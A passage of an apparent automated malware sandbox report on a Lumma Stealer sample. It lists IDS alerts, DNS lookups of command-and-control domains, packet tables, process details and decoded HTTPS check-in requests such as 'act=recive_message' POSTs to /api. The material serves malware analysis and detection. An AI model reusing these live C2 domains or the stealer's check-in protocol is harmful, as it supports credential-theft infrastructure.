2024-08-28T11:12:09.704804+0200	UDP	2055293	ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (charecteristicdxp .shop)	1	50915	53	192.168.2.5	1.1.1.1
2024-08-28T11:12:08.764763+0200	UDP	2055301	ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (potentioallykeos .shop)	1	49359	53	192.168.2.5	1.1.1.1
2024-08-28T11:12:10.976634+0200	TCP	2055294	ET MALWARE Observed Lumma Stealer Related Domain (charecteristicdxp .shop in TLS SNI)	1	49710	443	192.168.2.5	172.67.186.145
2024-08-28T11:12:11.465254+0200	TCP	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	49710	443	192.168.2.5	172.67.186.145
2024-08-28T11:12:11.465254+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	49710	443	192.168.2.5	172.67.186.145
2024-08-28T11:12:08.757349+0200	TCP	2049836	ET MALWARE Lumma Stealer Related Activity	1	49704	443	192.168.2.5	188.114.96.3
2024-08-28T11:12:08.757349+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	49704	443	192.168.2.5	188.114.96.3
2024-08-28T11:12:09.699817+0200	TCP	2049836	ET MALWARE Lumma Stealer Related Activity	1	49705	443	192.168.2.5	104.21.42.119
2024-08-28T11:12:09.699817+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	49705	443	192.168.2.5	104.21.42.119
2024-08-28T11:12:10.362401+0200	TCP	2055294	ET MALWARE Observed Lumma Stealer Related Domain (charecteristicdxp .shop in TLS SNI)	1	49707	443	192.168.2.5	172.67.186.145
2024-08-28T11:12:09.271414+0200	TCP	2055300	ET MALWARE Observed Lumma Stealer Related Domain (interactiedovspm .shop in TLS SNI)	1	49705	443	192.168.2.5	104.21.42.119
2024-08-28T11:12:08.788874+0200	UDP	2055299	ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (interactiedovspm .shop)	1	61958	53	192.168.2.5	1.1.1.1
2024-08-28T11:12:10.509496+0200	TCP	2049836	ET MALWARE Lumma Stealer Related Activity	1	49707	443	192.168.2.5	172.67.186.145
2024-08-28T11:12:10.509496+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	49707	443	192.168.2.5	172.67.186.145

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 28, 2024 11:12:07.784584999 CEST	49704	443	192.168.2.5	188.114.96.3
Aug 28, 2024 11:12:07.784615993 CEST	443	49704	188.114.96.3	192.168.2.5
Aug 28, 2024 11:12:07.784712076 CEST	49704	443	192.168.2.5	188.114.96.3
Aug 28, 2024 11:12:07.785707951 CEST	49704	443	192.168.2.5	188.114.96.3
Aug 28, 2024 11:12:07.785720110 CEST	443	49704	188.114.96.3	192.168.2.5
Aug 28, 2024 11:12:08.286084890 CEST	443	49704	188.114.96.3	192.168.2.5
Aug 28, 2024 11:12:08.286278963 CEST	49704	443	192.168.2.5	188.114.96.3
Aug 28, 2024 11:12:08.294718027 CEST	49704	443	192.168.2.5	188.114.96.3
Aug 28, 2024 11:12:08.294739962 CEST	443	49704	188.114.96.3	192.168.2.5
Aug 28, 2024 11:12:08.295052052 CEST	443	49704	188.114.96.3	192.168.2.5
Aug 28, 2024 11:12:08.336445093 CEST	49704	443	192.168.2.5	188.114.96.3
Aug 28, 2024 11:12:08.336471081 CEST	49704	443	192.168.2.5	188.114.96.3
Aug 28, 2024 11:12:08.336541891 CEST	443	49704	188.114.96.3	192.168.2.5
Aug 28, 2024 11:12:08.757359982 CEST	443	49704	188.114.96.3	192.168.2.5
Aug 28, 2024 11:12:08.757448912 CEST	443	49704	188.114.96.3	192.168.2.5
Aug 28, 2024 11:12:08.757510900 CEST	49704	443	192.168.2.5	188.114.96.3
Aug 28, 2024 11:12:08.760046959 CEST	49704	443	192.168.2.5	188.114.96.3
Aug 28, 2024 11:12:08.760059118 CEST	443	49704	188.114.96.3	192.168.2.5
Aug 28, 2024 11:12:08.760068893 CEST	49704	443	192.168.2.5	188.114.96.3
Aug 28, 2024 11:12:08.760073900 CEST	443	49704	188.114.96.3	192.168.2.5
Aug 28, 2024 11:12:08.808566093 CEST	49705	443	192.168.2.5	104.21.42.119
Aug 28, 2024 11:12:08.808599949 CEST	443	49705	104.21.42.119	192.168.2.5
Aug 28, 2024 11:12:08.808679104 CEST	49705	443	192.168.2.5	104.21.42.119
Aug 28, 2024 11:12:08.808960915 CEST	49705	443	192.168.2.5	104.21.42.119
Aug 28, 2024 11:12:08.808975935 CEST	443	49705	104.21.42.119	192.168.2.5
Aug 28, 2024 11:12:09.271188974 CEST	443	49705	104.21.42.119	192.168.2.5
Aug 28, 2024 11:12:09.271414042 CEST	49705	443	192.168.2.5	104.21.42.119
Aug 28, 2024 11:12:09.274138927 CEST	49705	443	192.168.2.5	104.21.42.119
Aug 28, 2024 11:12:09.274146080 CEST	443	49705	104.21.42.119	192.168.2.5
Aug 28, 2024 11:12:09.274388075 CEST	443	49705	104.21.42.119	192.168.2.5
Aug 28, 2024 11:12:09.275610924 CEST	49705	443	192.168.2.5	104.21.42.119
Aug 28, 2024 11:12:09.275628090 CEST	49705	443	192.168.2.5	104.21.42.119
Aug 28, 2024 11:12:09.275676966 CEST	443	49705	104.21.42.119	192.168.2.5
Aug 28, 2024 11:12:09.699842930 CEST	443	49705	104.21.42.119	192.168.2.5
Aug 28, 2024 11:12:09.699935913 CEST	443	49705	104.21.42.119	192.168.2.5
Aug 28, 2024 11:12:09.699989080 CEST	49705	443	192.168.2.5	104.21.42.119
Aug 28, 2024 11:12:09.700221062 CEST	49705	443	192.168.2.5	104.21.42.119
Aug 28, 2024 11:12:09.700237989 CEST	443	49705	104.21.42.119	192.168.2.5
Aug 28, 2024 11:12:09.719995022 CEST	49707	443	192.168.2.5	172.67.186.145
Aug 28, 2024 11:12:09.720032930 CEST	443	49707	172.67.186.145	192.168.2.5
Aug 28, 2024 11:12:09.720104933 CEST	49707	443	192.168.2.5	172.67.186.145
Aug 28, 2024 11:12:09.720568895 CEST	49707	443	192.168.2.5	172.67.186.145
Aug 28, 2024 11:12:09.720578909 CEST	443	49707	172.67.186.145	192.168.2.5
Aug 28, 2024 11:12:10.362303972 CEST	443	49707	172.67.186.145	192.168.2.5
Aug 28, 2024 11:12:10.362401009 CEST	49707	443	192.168.2.5	172.67.186.145
Aug 28, 2024 11:12:10.392389059 CEST	49707	443	192.168.2.5	172.67.186.145
Aug 28, 2024 11:12:10.392402887 CEST	443	49707	172.67.186.145	192.168.2.5
Aug 28, 2024 11:12:10.392729998 CEST	443	49707	172.67.186.145	192.168.2.5
Aug 28, 2024 11:12:10.393815994 CEST	49707	443	192.168.2.5	172.67.186.145
Aug 28, 2024 11:12:10.393847942 CEST	49707	443	192.168.2.5	172.67.186.145
Aug 28, 2024 11:12:10.393883944 CEST	443	49707	172.67.186.145	192.168.2.5
Aug 28, 2024 11:12:10.509515047 CEST	443	49707	172.67.186.145	192.168.2.5
Aug 28, 2024 11:12:10.509562016 CEST	443	49707	172.67.186.145	192.168.2.5
Aug 28, 2024 11:12:10.509596109 CEST	443	49707	172.67.186.145	192.168.2.5
Aug 28, 2024 11:12:10.509605885 CEST	49707	443	192.168.2.5	172.67.186.145
Aug 28, 2024 11:12:10.509615898 CEST	443	49707	172.67.186.145	192.168.2.5
Aug 28, 2024 11:12:10.509651899 CEST	49707	443	192.168.2.5	172.67.186.145
Aug 28, 2024 11:12:10.509658098 CEST	443	49707	172.67.186.145	192.168.2.5
Aug 28, 2024 11:12:10.509704113 CEST	443	49707	172.67.186.145	192.168.2.5
Aug 28, 2024 11:12:10.509747982 CEST	49707	443	192.168.2.5	172.67.186.145
Aug 28, 2024 11:12:10.513516903 CEST	49707	443	192.168.2.5	172.67.186.145
Aug 28, 2024 11:12:10.513533115 CEST	443	49707	172.67.186.145	192.168.2.5
Aug 28, 2024 11:12:10.513542891 CEST	49707	443	192.168.2.5	172.67.186.145
Aug 28, 2024 11:12:10.513547897 CEST	443	49707	172.67.186.145	192.168.2.5
Aug 28, 2024 11:12:10.518774033 CEST	49710	443	192.168.2.5	172.67.186.145
Aug 28, 2024 11:12:10.518794060 CEST	443	49710	172.67.186.145	192.168.2.5
Aug 28, 2024 11:12:10.518851995 CEST	49710	443	192.168.2.5	172.67.186.145
Aug 28, 2024 11:12:10.519119978 CEST	49710	443	192.168.2.5	172.67.186.145
Aug 28, 2024 11:12:10.519129992 CEST	443	49710	172.67.186.145	192.168.2.5
Aug 28, 2024 11:12:10.976553917 CEST	443	49710	172.67.186.145	192.168.2.5
Aug 28, 2024 11:12:10.976634026 CEST	49710	443	192.168.2.5	172.67.186.145
Aug 28, 2024 11:12:10.977946997 CEST	49710	443	192.168.2.5	172.67.186.145
Aug 28, 2024 11:12:10.977952003 CEST	443	49710	172.67.186.145	192.168.2.5
Aug 28, 2024 11:12:10.978185892 CEST	443	49710	172.67.186.145	192.168.2.5
Aug 28, 2024 11:12:10.979796886 CEST	49710	443	192.168.2.5	172.67.186.145
Aug 28, 2024 11:12:10.979877949 CEST	49710	443	192.168.2.5	172.67.186.145
Aug 28, 2024 11:12:10.979901075 CEST	443	49710	172.67.186.145	192.168.2.5
Aug 28, 2024 11:12:11.465276003 CEST	443	49710	172.67.186.145	192.168.2.5
Aug 28, 2024 11:12:11.465368986 CEST	443	49710	172.67.186.145	192.168.2.5
Aug 28, 2024 11:12:11.465445995 CEST	49710	443	192.168.2.5	172.67.186.145
Aug 28, 2024 11:12:11.467137098 CEST	49710	443	192.168.2.5	172.67.186.145
Aug 28, 2024 11:12:11.467164040 CEST	443	49710	172.67.186.145	192.168.2.5
Aug 28, 2024 11:12:11.467175961 CEST	49710	443	192.168.2.5	172.67.186.145
Aug 28, 2024 11:12:11.467180014 CEST	443	49710	172.67.186.145	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 28, 2024 11:12:07.763827085 CEST	50774	53	192.168.2.5	1.1.1.1
Aug 28, 2024 11:12:07.780101061 CEST	53	50774	1.1.1.1	192.168.2.5
Aug 28, 2024 11:12:08.764763117 CEST	49359	53	192.168.2.5	1.1.1.1
Aug 28, 2024 11:12:08.774938107 CEST	53	49359	1.1.1.1	192.168.2.5
Aug 28, 2024 11:12:08.788873911 CEST	61958	53	192.168.2.5	1.1.1.1
Aug 28, 2024 11:12:08.807491064 CEST	53	61958	1.1.1.1	192.168.2.5
Aug 28, 2024 11:12:09.704803944 CEST	50915	53	192.168.2.5	1.1.1.1
Aug 28, 2024 11:12:09.719113111 CEST	53	50915	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 28, 2024 11:12:07.763827085 CEST	192.168.2.5	1.1.1.1	0xacad	Standard query (0)	largerryskwhq.shop	A (IP address)	IN (0x0001)	false
Aug 28, 2024 11:12:08.764763117 CEST	192.168.2.5	1.1.1.1	0xcb0b	Standard query (0)	potentioallykeos.shop	A (IP address)	IN (0x0001)	false
Aug 28, 2024 11:12:08.788873911 CEST	192.168.2.5	1.1.1.1	0x356a	Standard query (0)	interactiedovspm.shop	A (IP address)	IN (0x0001)	false
Aug 28, 2024 11:12:09.704803944 CEST	192.168.2.5	1.1.1.1	0x3370	Standard query (0)	charecteristicdxp.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Aug 28, 2024 11:12:07.780101061 CEST	1.1.1.1	192.168.2.5	0xacad	No error (0)	largerryskwhq.shop		188.114.96.3	A (IP address)	IN (0x0001)	false
Aug 28, 2024 11:12:07.780101061 CEST	1.1.1.1	192.168.2.5	0xacad	No error (0)	largerryskwhq.shop		188.114.97.3	A (IP address)	IN (0x0001)	false
Aug 28, 2024 11:12:08.774938107 CEST	1.1.1.1	192.168.2.5	0xcb0b	Name error (3)	potentioallykeos.shop	none	none	A (IP address)	IN (0x0001)	false
Aug 28, 2024 11:12:08.807491064 CEST	1.1.1.1	192.168.2.5	0x356a	No error (0)	interactiedovspm.shop		104.21.42.119	A (IP address)	IN (0x0001)	false
Aug 28, 2024 11:12:08.807491064 CEST	1.1.1.1	192.168.2.5	0x356a	No error (0)	interactiedovspm.shop		172.67.161.217	A (IP address)	IN (0x0001)	false
Aug 28, 2024 11:12:09.719113111 CEST	1.1.1.1	192.168.2.5	0x3370	No error (0)	charecteristicdxp.shop		172.67.186.145	A (IP address)	IN (0x0001)	false
Aug 28, 2024 11:12:09.719113111 CEST	1.1.1.1	192.168.2.5	0x3370	No error (0)	charecteristicdxp.shop		104.21.84.50	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

largerryskwhq.shop

interactiedovspm.shop

charecteristicdxp.shop

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	188.114.96.3	443	1216	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-28 09:12:08 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: largerryskwhq.shop
2024-08-28 09:12:08 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-08-28 09:12:08 UTC	802	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 09:12:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=3lgifa6tjfmm8i8lkggshesv2t; expires=Sun, 22-Dec-2024 02:58:47 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8FBjcGjmIo2OR8u2s7ouPfC%2FNmvXQR9%2FkFUoWCrfl9uCuTIwg5aYOblEmmK8kpHS40PNTLIiZStMXepLbwc2htgRCwQlduVMO9JQabD85OF8Mr2HJmrmydZx%2BM5rpQUynxFnM0U%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ba32d8c69650f8b-EWR alt-svc: h3=":443"; ma=86400
2024-08-28 09:12:08 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-08-28 09:12:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49705	104.21.42.119	443	1216	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-28 09:12:09 UTC	268	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: interactiedovspm.shop
2024-08-28 09:12:09 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-08-28 09:12:09 UTC	806	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 09:12:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=248v0e5dbtn473d7r5erru081f; expires=Sun, 22-Dec-2024 02:58:48 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MgOewJF59mHFqzMcItWkgfLuch2BYYRzNfm87vZnIRTRuAoNFLt1BE34pd2dJGG5qbCpmIdtDC67J6dqln4x4HvZCCuyPcjP22Y0BCTTnxDNEsX5%2FGu4k%2F%2Bxe34M2F2ptqVSeLyrxlE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ba32d92696143d9-EWR alt-svc: h3=":443"; ma=86400
2024-08-28 09:12:09 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-08-28 09:12:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49707	172.67.186.145	443	1216	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-28 09:12:10 UTC	269	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: charecteristicdxp.shop
2024-08-28 09:12:10 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-08-28 09:12:10 UTC	555	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 09:12:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p7Izytb%2FOIzHc5ewrJrM4Udzx2TYYnMekSy0RbmYFMahFoQvbjFTY5Q5e8UGb%2FCNDF5WWw4%2B8YKdFIjA5PyMmweN8PYf9PXMWqbjpe7F6tjl0HcvPk8r85R4YqAOPEKfbM%2FNxvt1aRyD"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ba32d994b3041c0-EWR
2024-08-28 09:12:10 UTC	814	IN	Data Raw: 31 31 32 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 112d<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-08-28 09:12:10 UTC	1369	IN	Data Raw: 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 Data Ascii: les/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('
2024-08-28 09:12:10 UTC	1369	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 6c 33 61 44 35 6b 51 4e 46 41 46 4a 30 75 73 32 7a 6e 48 4d 74 42 56 69 47 4b 74 5a 36 37 33 31 4e 34 45 4e 53 61 52 4c 77 4c 49 2d 31 37 32 34 38 33 36 33 33 30 2d 30 2e 30 2e 31 2e 31 2d 2f 61 70 69 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e Data Ascii: <input type="hidden" name="atok" value="l3aD5kQNFAFJ0us2znHMtBViGKtZ6731N4ENSaRLwLI-1724836330-0.0.1.1-/api"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn
2024-08-28 09:12:10 UTC	853	IN	Data Raw: 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 Data Ascii: or sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflar
2024-08-28 09:12:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49710	172.67.186.145	443	1216	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-28 09:12:10 UTC	359	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Cookie: __cf_mw_byp=l3aD5kQNFAFJ0us2znHMtBViGKtZ6731N4ENSaRLwLI-1724836330-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 50 Host: charecteristicdxp.shop
2024-08-28 09:12:10 UTC	50	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4a 79 63 68 52 2d 2d 61 6d 65 74 68 79 73 74 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=LJychR--amethyst&j=
2024-08-28 09:12:11 UTC	802	IN	HTTP/1.1 200 OK Date: Wed, 28 Aug 2024 09:12:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=pknnoebrol0qpn3qkksp9q5l96; expires=Sun, 22-Dec-2024 02:58:50 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TbspxJl2SFSkKU8byTZrTPMCO4DbWrOqyX%2Bm5iA3WSjs7mMZogqJvFMNZg5jUfi6fqZa0WzndUlr5xHqQjDqVBT97asSUtffeJdbmqKFL8dHs5ALUQcSHF2aWlE38zv%2FDkVUTu3oAnF4"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ba32d9d0b9ec427-EWR alt-svc: h3=":443"; ma=86400
2024-08-28 09:12:11 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-08-28 09:12:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	05:11:53
Start date:	28/08/2024
Path:	C:\Users\user\Desktop\setup.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\setup.exe"
Imagebase:	0xf20000
File size:	11'890'176 bytes
MD5 hash:	F7AD8585ED9A9B46B3A98A64A7780DC6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.2149222057.0000000003968000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	05:12:04
Start date:	28/08/2024
Path:	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Imagebase:	0xd20000
File size:	231'736 bytes
MD5 hash:	A64BEAB5D4516BECA4C40B25DC0C1CD8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	05:12:10
Start date:	28/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 1420
Imagebase:	0xf40000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	1.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	42.4%
Total number of Nodes:	66
Total number of Limit Nodes:	6

Executed Functions

Function 0040AE60 Relevance: 7.6, APIs: 2, Strings: 2, Instructions: 562
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(33C335BF,00000000,00000800), ref: 0040AF02
GetProcessVersion.KERNEL32(00000000), ref: 0040B105

Strings

`, xrefs: 0040B2AA
charecteristicdxp.shop, xrefs: 0040B349, 0040B594

Memory Dump Source

Source File: 00000002.00000002.2184480618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: LibraryLoadProcessVersion
String ID: `$charecteristicdxp.shop
API String ID: 1829952579-4281772879
Opcode ID: 5dc5de6e577f9aa56ec3f725286f192b5909725cfcc629b289abb7ac2d18367d
Instruction ID: 3197dc864971dd2a99ffa80abae852232bf939184eaa0228fa32d3228d526831
Opcode Fuzzy Hash: 5dc5de6e577f9aa56ec3f725286f192b5909725cfcc629b289abb7ac2d18367d
